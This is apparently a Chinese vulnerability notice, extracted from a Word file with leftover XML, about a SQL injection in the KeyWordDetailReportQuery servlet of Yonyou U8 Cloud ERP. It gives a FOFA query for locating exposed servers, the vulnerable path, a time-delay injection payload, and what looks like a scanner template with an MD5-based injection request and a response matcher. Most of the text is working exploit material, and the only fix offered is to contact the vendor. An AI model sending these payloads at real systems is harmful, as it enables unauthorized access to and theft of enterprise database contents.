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用友U8 cloud KeyWordDetailReportQuery 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用友U8 Cloud 提供企业级云ERP整体解决方案，全面支持多组织业务协同，实现企业互联网资源连接。 U8 Cloud 亦是亚太地区成长型企业最广泛采用的云解决方案。用友U8 cloud KeyWordDetailReportQuery 接口处存在SQL注入漏洞，攻击者未经授权可以访问数据库中的数据，从而盗取用户数据，造成用户信息泄露。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app="用友-U8-Cloud"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/servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery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your-ip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application/json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{"reportType":"';WAITFOR DELAY '0:0:5'--","usercode":"18701014496","keyword":[{"keywordPk":"1","keywordValue":"1","keywordIndex":1}]}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5880" cy="269557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yongyou-nc-fileread-nc_uap_lfw_file_action_DocServlet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用友U8 cloud KeyWordDetailReportQuery存在sql注入漏洞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medium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description: 用友U8 Cloud  KeyWordDetailReportQuery接口处存在sql漏洞，攻击者可通过该漏洞获取数据库中的敏感信息。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metadata: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fofa-query: app="用友-U8-Cloud"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   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POST /servlet/~iufo/nc.itf.iufo.mobilereport.data.KeyWordDetailReportQuery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5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info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Content-Length: 207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Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3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zh-CN,zh;q=0.8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Cache-Control: max-age=0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Content-Type: application/json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SL-CE-SUID: 29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{"reportType": "' AND 2780 IN (select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) AND 'njGF'='njGF", "usercode": "18701014496", "keyword": [{"keywordPk": "1", "keywordValue": "1", "keywordIndex": 1}]}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'status_code==200 &amp;&amp; contains_all(body,"e10adc3949ba59abbe56e057f20f883e")'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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>请联系厂商进行修复。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38B9F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0D338B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C2910BD"/>
    <w:rsid w:val="63A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2024-01-02T02:22:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-02T02:28:33Z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D32AED71201D4E009A42B041BA5021FC_12</vt:lpwstr>
  </property>
</Properties>
</file>